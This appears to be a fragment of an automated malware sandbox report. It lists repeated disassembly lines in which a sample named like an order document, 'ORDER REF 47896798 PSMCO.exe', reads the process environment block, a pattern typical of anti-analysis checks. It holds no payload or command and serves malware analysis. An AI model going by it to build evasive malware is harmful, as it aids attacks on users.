                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193E5CF mov eax, dword ptr fs:[00000030h]5_2_0193E5CF
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193E5CF mov eax, dword ptr fs:[00000030h]5_2_0193E5CF
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019025E0 mov eax, dword ptr fs:[00000030h]5_2_019025E0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192E5E7 mov eax, dword ptr fs:[00000030h]5_2_0192E5E7
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192E5E7 mov eax, dword ptr fs:[00000030h]5_2_0192E5E7
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192E5E7 mov eax, dword ptr fs:[00000030h]5_2_0192E5E7
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192E5E7 mov eax, dword ptr fs:[00000030h]5_2_0192E5E7
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192E5E7 mov eax, dword ptr fs:[00000030h]5_2_0192E5E7
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192E5E7 mov eax, dword ptr fs:[00000030h]5_2_0192E5E7
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192E5E7 mov eax, dword ptr fs:[00000030h]5_2_0192E5E7
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192E5E7 mov eax, dword ptr fs:[00000030h]5_2_0192E5E7
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193C5ED mov eax, dword ptr fs:[00000030h]5_2_0193C5ED
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193C5ED mov eax, dword ptr fs:[00000030h]5_2_0193C5ED
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01996500 mov eax, dword ptr fs:[00000030h]5_2_01996500
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D4500 mov eax, dword ptr fs:[00000030h]5_2_019D4500
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D4500 mov eax, dword ptr fs:[00000030h]5_2_019D4500
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D4500 mov eax, dword ptr fs:[00000030h]5_2_019D4500
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D4500 mov eax, dword ptr fs:[00000030h]5_2_019D4500
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D4500 mov eax, dword ptr fs:[00000030h]5_2_019D4500
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D4500 mov eax, dword ptr fs:[00000030h]5_2_019D4500
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D4500 mov eax, dword ptr fs:[00000030h]5_2_019D4500
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910535 mov eax, dword ptr fs:[00000030h]5_2_01910535
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910535 mov eax, dword ptr fs:[00000030h]5_2_01910535
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910535 mov eax, dword ptr fs:[00000030h]5_2_01910535
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910535 mov eax, dword ptr fs:[00000030h]5_2_01910535
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910535 mov eax, dword ptr fs:[00000030h]5_2_01910535
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910535 mov eax, dword ptr fs:[00000030h]5_2_01910535
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192E53E mov eax, dword ptr fs:[00000030h]5_2_0192E53E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192E53E mov eax, dword ptr fs:[00000030h]5_2_0192E53E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192E53E mov eax, dword ptr fs:[00000030h]5_2_0192E53E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192E53E mov eax, dword ptr fs:[00000030h]5_2_0192E53E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192E53E mov eax, dword ptr fs:[00000030h]5_2_0192E53E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01908550 mov eax, dword ptr fs:[00000030h]5_2_01908550
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01908550 mov eax, dword ptr fs:[00000030h]5_2_01908550
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193656A mov eax, dword ptr fs:[00000030h]5_2_0193656A
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193656A mov eax, dword ptr fs:[00000030h]5_2_0193656A
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193656A mov eax, dword ptr fs:[00000030h]5_2_0193656A
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019BA49A mov eax, dword ptr fs:[00000030h]5_2_019BA49A
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019344B0 mov ecx, dword ptr fs:[00000030h]5_2_019344B0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0198A4B0 mov eax, dword ptr fs:[00000030h]5_2_0198A4B0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019064AB mov eax, dword ptr fs:[00000030h]5_2_019064AB
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019004E5 mov ecx, dword ptr fs:[00000030h]5_2_019004E5
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01938402 mov eax, dword ptr fs:[00000030h]5_2_01938402
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01938402 mov eax, dword ptr fs:[00000030h]5_2_01938402
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01938402 mov eax, dword ptr fs:[00000030h]5_2_01938402
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193A430 mov eax, dword ptr fs:[00000030h]5_2_0193A430
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018FC427 mov eax, dword ptr fs:[00000030h]5_2_018FC427
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018FE420 mov eax, dword ptr fs:[00000030h]5_2_018FE420
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018FE420 mov eax, dword ptr fs:[00000030h]5_2_018FE420
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018FE420 mov eax, dword ptr fs:[00000030h]5_2_018FE420
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01986420 mov eax, dword ptr fs:[00000030h]5_2_01986420
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01986420 mov eax, dword ptr fs:[00000030h]5_2_01986420
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01986420 mov eax, dword ptr fs:[00000030h]5_2_01986420
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01986420 mov eax, dword ptr fs:[00000030h]5_2_01986420
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01986420 mov eax, dword ptr fs:[00000030h]5_2_01986420
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01986420 mov eax, dword ptr fs:[00000030h]5_2_01986420
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01986420 mov eax, dword ptr fs:[00000030h]5_2_01986420
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192245A mov eax, dword ptr fs:[00000030h]5_2_0192245A
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019BA456 mov eax, dword ptr fs:[00000030h]5_2_019BA456
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193E443 mov eax, dword ptr fs:[00000030h]5_2_0193E443
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193E443 mov eax, dword ptr fs:[00000030h]5_2_0193E443
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193E443 mov eax, dword ptr fs:[00000030h]5_2_0193E443
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193E443 mov eax, dword ptr fs:[00000030h]5_2_0193E443
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193E443 mov eax, dword ptr fs:[00000030h]5_2_0193E443
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193E443 mov eax, dword ptr fs:[00000030h]5_2_0193E443
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193E443 mov eax, dword ptr fs:[00000030h]5_2_0193E443
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193E443 mov eax, dword ptr fs:[00000030h]5_2_0193E443
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018F645D mov eax, dword ptr fs:[00000030h]5_2_018F645D
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192A470 mov eax, dword ptr fs:[00000030h]5_2_0192A470
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192A470 mov eax, dword ptr fs:[00000030h]5_2_0192A470
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0192A470 mov eax, dword ptr fs:[00000030h]5_2_0192A470
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0198C460 mov ecx, dword ptr fs:[00000030h]5_2_0198C460
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019A678E mov eax, dword ptr fs:[00000030h]5_2_019A678E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019B47A0 mov eax, dword ptr fs:[00000030h]5_2_019B47A0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019007AF mov eax, dword ptr fs:[00000030h]5_2_019007AF
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190C7C0 mov eax, dword ptr fs:[00000030h]5_2_0190C7C0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019807C3 mov eax, dword ptr fs:[00000030h]5_2_019807C3
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019047FB mov eax, dword ptr fs:[00000030h]5_2_019047FB
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019047FB mov eax, dword ptr fs:[00000030h]5_2_019047FB
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0198E7E1 mov eax, dword ptr fs:[00000030h]5_2_0198E7E1
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019227ED mov eax, dword ptr fs:[00000030h]5_2_019227ED
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019227ED mov eax, dword ptr fs:[00000030h]5_2_019227ED
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019227ED mov eax, dword ptr fs:[00000030h]5_2_019227ED
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01900710 mov eax, dword ptr fs:[00000030h]5_2_01900710
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01930710 mov eax, dword ptr fs:[00000030h]5_2_01930710
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193C700 mov eax, dword ptr fs:[00000030h]5_2_0193C700
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0197C730 mov eax, dword ptr fs:[00000030h]5_2_0197C730
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193273C mov eax, dword ptr fs:[00000030h]5_2_0193273C
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193273C mov ecx, dword ptr fs:[00000030h]5_2_0193273C
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193273C mov eax, dword ptr fs:[00000030h]5_2_0193273C
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193C720 mov eax, dword ptr fs:[00000030h]5_2_0193C720
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193C720 mov eax, dword ptr fs:[00000030h]5_2_0193C720
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01900750 mov eax, dword ptr fs:[00000030h]5_2_01900750
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942750 mov eax, dword ptr fs:[00000030h]5_2_01942750
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942750 mov eax, dword ptr fs:[00000030h]5_2_01942750
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0198E75D mov eax, dword ptr fs:[00000030h]5_2_0198E75D
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01984755 mov eax, dword ptr fs:[00000030h]5_2_01984755
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193674D mov esi, dword ptr fs:[00000030h]5_2_0193674D
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193674D mov eax, dword ptr fs:[00000030h]5_2_0193674D
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193674D mov eax, dword ptr fs:[00000030h]5_2_0193674D
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01908770 mov eax, dword ptr fs:[00000030h]5_2_01908770
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910770 mov eax, dword ptr fs:[00000030h]5_2_01910770
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910770 mov eax, dword ptr fs:[00000030h]5_2_01910770
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910770 mov eax, dword ptr fs:[00000030h]5_2_01910770
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910770 mov eax, dword ptr fs:[00000030h]5_2_01910770
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910770 mov eax, dword ptr fs:[00000030h]5_2_01910770
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910770 mov eax, dword ptr fs:[00000030h]5_2_01910770
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910770 mov eax, dword ptr fs:[00000030h]5_2_01910770
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910770 mov eax, dword ptr fs:[00000030h]5_2_01910770
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910770 mov eax, dword ptr fs:[00000030h]5_2_01910770
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910770 mov eax, dword ptr fs:[00000030h]5_2_01910770
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910770 mov eax, dword ptr fs:[00000030h]5_2_01910770
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01910770 mov eax, dword ptr fs:[00000030h]5_2_01910770
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01904690 mov eax, dword ptr fs:[00000030h]5_2_01904690
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01904690 mov eax, dword ptr fs:[00000030h]5_2_01904690
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019366B0 mov eax, dword ptr fs:[00000030h]5_2_019366B0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193C6A6 mov eax, dword ptr fs:[00000030h]5_2_0193C6A6
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193A6C7 mov ebx, dword ptr fs:[00000030h]5_2_0193A6C7
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193A6C7 mov eax, dword ptr fs:[00000030h]5_2_0193A6C7
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0197E6F2 mov eax, dword ptr fs:[00000030h]5_2_0197E6F2
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0197E6F2 mov eax, dword ptr fs:[00000030h]5_2_0197E6F2
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0197E6F2 mov eax, dword ptr fs:[00000030h]5_2_0197E6F2
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0197E6F2 mov eax, dword ptr fs:[00000030h]5_2_0197E6F2
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019806F1 mov eax, dword ptr fs:[00000030h]5_2_019806F1
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019806F1 mov eax, dword ptr fs:[00000030h]5_2_019806F1
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01942619 mov eax, dword ptr fs:[00000030h]5_2_01942619
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0191260B mov eax, dword ptr fs:[00000030h]5_2_0191260B
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0191260B mov eax, dword ptr fs:[00000030h]5_2_0191260B
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0191260B mov eax, dword ptr fs:[00000030h]5_2_0191260B
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0191260B mov eax, dword ptr fs:[00000030h]5_2_0191260B
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0191260B mov eax, dword ptr fs:[00000030h]5_2_0191260B
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0191260B mov eax, dword ptr fs:[00000030h]5_2_0191260B
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0191260B mov eax, dword ptr fs:[00000030h]5_2_0191260B
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0197E609 mov eax, dword ptr fs:[00000030h]5_2_0197E609
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01936620 mov eax, dword ptr fs:[00000030h]5_2_01936620
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01938620 mov eax, dword ptr fs:[00000030h]5_2_01938620
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0191E627 mov eax, dword ptr fs:[00000030h]5_2_0191E627
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190262C mov eax, dword ptr fs:[00000030h]5_2_0190262C
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0191C640 mov eax, dword ptr fs:[00000030h]5_2_0191C640
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01932674 mov eax, dword ptr fs:[00000030h]5_2_01932674
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019C866E mov eax, dword ptr fs:[00000030h]5_2_019C866E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019C866E mov eax, dword ptr fs:[00000030h]5_2_019C866E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193A660 mov eax, dword ptr fs:[00000030h]5_2_0193A660
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0193A660 mov eax, dword ptr fs:[00000030h]5_2_0193A660
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019889B3 mov esi, dword ptr fs:[00000030h]5_2_019889B3
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019889B3 mov eax, dword ptr fs:[00000030h]5_2_019889B3
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019889B3 mov eax, dword ptr fs:[00000030h]5_2_019889B3
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019129A0 mov eax, dword ptr fs:[00000030h]5_2_019129A0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019129A0 mov eax, dword ptr fs:[00000030h]5_2_019129A0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019129A0 mov eax, dword ptr fs:[00000030h]5_2_019129A0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019129A0 mov eax, dword ptr fs:[00000030h]5_2_019129A0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019129A0 mov eax, dword ptr fs:[00000030h]5_2_019129A0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019129A0 mov eax, dword ptr fs:[00000030h]5_2_019129A0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019129A0 mov eax, dword ptr fs:[00000030h]5_2_019129A0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019129A0 mov eax, dword ptr fs:[00000030h]5_2_019129A0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019129A0 mov eax, dword ptr fs:[00000030h]5_2_019129A0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019129A0 mov eax, dword ptr fs:[00000030h]5_2_019129A0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019129A0 mov eax, dword ptr fs:[00000030h]5_2_019129A0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019129A0 mov eax, dword ptr fs:[00000030h]5_2_019129A0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019129A0 mov eax, dword ptr fs:[00000030h]5_2_019129A0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019009AD mov eax, dword ptr fs:[00000030h]5_2_019009AD
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019009AD mov eax, dword ptr fs:[00000030h]5_2_019009AD
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190A9D0 mov eax, dword ptr fs:[00000030h]5_2_0190A9D0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190A9D0 mov eax, dword ptr fs:[00000030h]5_2_0190A9D0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190A9D0 mov eax, dword ptr fs:[00000030h]5_2_0190A9D0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190A9D0 mov eax, dword ptr fs:[00000030h]5_2_0190A9D0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190A9D0 mov eax, dword ptr fs:[00000030h]5_2_0190A9D0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0190A9D0 mov eax, dword ptr fs:[00000030h]5_2_0190A9D0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019349D0 mov eax, dword ptr fs:[00000030h]5_2_019349D0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019CA9D3 mov eax, dword ptr fs:[00000030h]5_2_019CA9D3
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019969C0 mov eax, dword ptr fs:[00000030h]5_2_019969C0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019329F9 mov eax, dword ptr fs:[00000030h]5_2_019329F9
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019329F9 mov eax, dword ptr fs:[00000030h]5_2_019329F9
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0198E9E0 mov eax, dword ptr fs:[00000030h]5_2_0198E9E0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0198C912 mov eax, dword ptr fs:[00000030h]5_2_0198C912
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018F8918 mov eax, dword ptr fs:[00000030h]5_2_018F8918
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018F8918 mov eax, dword ptr fs:[00000030h]5_2_018F8918
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0197E908 mov eax, dword ptr fs:[00000030h]5_2_0197E908
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0197E908 mov eax, dword ptr fs:[00000030h]5_2_0197E908
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0198892A mov eax, dword ptr fs:[00000030h]5_2_0198892A
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0199892B mov eax, dword ptr fs:[00000030h]5_2_0199892B
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019D4940 mov eax, dword ptr fs:[00000030h]5_2_019D4940
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01980946 mov eax, dword ptr fs:[00000030h]5_2_01980946
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019A4978 mov eax, dword ptr fs:[00000030h]5_2_019A4978
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019A4978 mov eax, dword ptr fs:[00000030h]5_2_019A4978
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0198C97C mov eax, dword ptr fs:[00000030h]5_2_0198C97C
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01926962 mov eax, dword ptr fs:[00000030h]5_2_01926962
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01926962 mov eax, dword ptr fs:[00000030h]5_2_01926962
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01926962 mov eax, dword ptr fs:[00000030h]5_2_01926962
